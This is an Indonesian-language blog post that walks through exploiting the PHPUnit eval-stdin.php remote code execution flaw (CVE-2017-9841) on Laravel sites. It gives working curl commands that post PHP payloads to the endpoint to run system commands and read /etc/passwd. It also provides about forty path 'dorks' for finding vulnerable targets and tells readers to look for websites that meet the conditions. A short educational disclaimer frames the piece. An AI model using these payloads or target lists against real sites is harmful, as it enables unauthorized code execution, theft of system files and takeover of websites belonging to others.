Dork Laravel PHPUnit RCE Terbaru di 2021

Laravel-PHPUnit-CVE-2017

Laravel PHPUnit RCE - Salah satu bug lain yang telah ada sejak lama, tetapi mulai populer lagi belakangan ini. Sebelumnya, ada juga postingan mengenai Laravel App_Key yang baru-baru ini sedang tren karena banyak yang memanfaatkan kerentanan remote code execution, sehingga dapat melakukan upload shell ke dalam website.

Perlu diketahui, ini bukanlah bug dari Laravel melainkan dari pihak ketiga yang digunakan oleh admin website itu sendiri, yaitu PHPUnit. Dampak yang diberikan oleh kerentanan ini adalah sang hacker dapat melakukan panggilan perintah apapun, seperti upload file dan mampu mengendalikan website dari jarak jauh.

Informasi Laravel PHPUnit RCE:
  • CVE-2017-9841
  • Type vuln Remote Code Execution
  • Vulnerability PHPUnit eval-stdin.php
  • Author David Mudraik
  • Published Jun 27 2017
  • Lokasi vuln http://websitemu.com/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • Version PHPUnit 4.8.28 dan < 5.6.3
Untuk mencoba kerentanan ini, kamu harus mencoba mencari website yang sudah mempenuhi persyaratan diatas. Jika tidak, maka perintah apapun yang kamu coba tidak akan berhasil muncul hasilnya. Namun, lebih baik dicoba menggunakan website sendiri agar mengetahui bagaimana bug ini bekerja. Artikel ini dipublikasikan sebagaimana untuk mengedukasi bagi developer yang menggunakan Laravel beserta PHPUnit khususnya yang menggunakan versi diatas.

Untuk mengeksploitasi Laravel PHPUnit eval-stdin.php, yang harus kamu persiapkan adalah memahami basic dari cURL. Ini nantinya akan kita coba dan caranya juga cukup mudah untuk dipraktikkan.

Perintah cURL Windows dan Linux untuk eksekusi PHPUnit RCE:
  • -d  : Mengirim data berupa param POST
  • -o  : Menyimpan file yang diunduh di sistem lokal dengan parameter yang diberikan
  • -x  : Menggunakan proxy
  • -v  : Menampilkan informasi header request dan respon website
  • -O : Menyimpan file dengan nama yang sama di URL
  • -T : Upload file menggunakan username:password FTP Server 
Penggunaan perintah cURL Laravel PHPUnit RCE:
  • curl -v targetwebsite.com
  • curl -o file.zip ftp://targetwebsite.com/1MB.zip
  • curl -O ftp://targetwebsite.com/1MB.zip
  • curl -T newfile.tar.gz -u FTP_USERNAME:FTP_PASSWORD ftp://ftp.targetwebsite.com/
  • curl -x 192.168.77.1:1337 http://targetwebsite.com/
  • curl -d "<?php echo php_uname(); ?>" http://target.com/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • curl -d "<?php system('tail /etc/passwd'); ?>" http://target.com/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • curl -d "<?php show_source('/etc/passwd'); ?>" http://target.com/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
Berikut ini adalah dork Laravel PHPUnit RCE:
  • /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • /xipada/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • /yiicarwx/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • /yiiold/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • /ws/geral/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • /wsviamatica/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • /wsviamatica/wszool/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • /wszool/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • /web.public/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • /web.public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • /web/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • /web/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php
  • /vendor/nesbot/carbon/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • /vendor/phpunit/phpunit/LICENSE/eval-stdin.php
  • /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php
  • /vendor/phpunit/src/Util/PHP/eval-stdin.php
  • /2018/scholarship/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • /2018/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • /2018/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php
  • /2019/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • /2019/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php
  • /2020/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • /2020/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php
  • /vendor/phpunit/Util/PHP/eval-stdin.php
  • /v1/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • /v1/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php
  • /v2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • /v2/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php
  • /testing/laravel/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php
  • /testing/laravel/vendor/phpunit/src/Util/PHP/eval-stdin.php
  • /testing/laravel/vendor/phpunit/Util/PHP/eval-stdin.php
  • /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • /testing/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php
  • /testing/vendor/phpunit/src/Util/PHP/eval-stdin.php
Nah itulah contoh penggunaan perintah cURL dalam mengeksploitasi kerentanan PHPUnit. Semoga artikel ini bermanfaat bagi developer untuk segera memperbarui PHPUnit agar tidak terjadi hal-hal yang tidak diinginkan di kemudian hari.

Posting Komentar

0 Komentar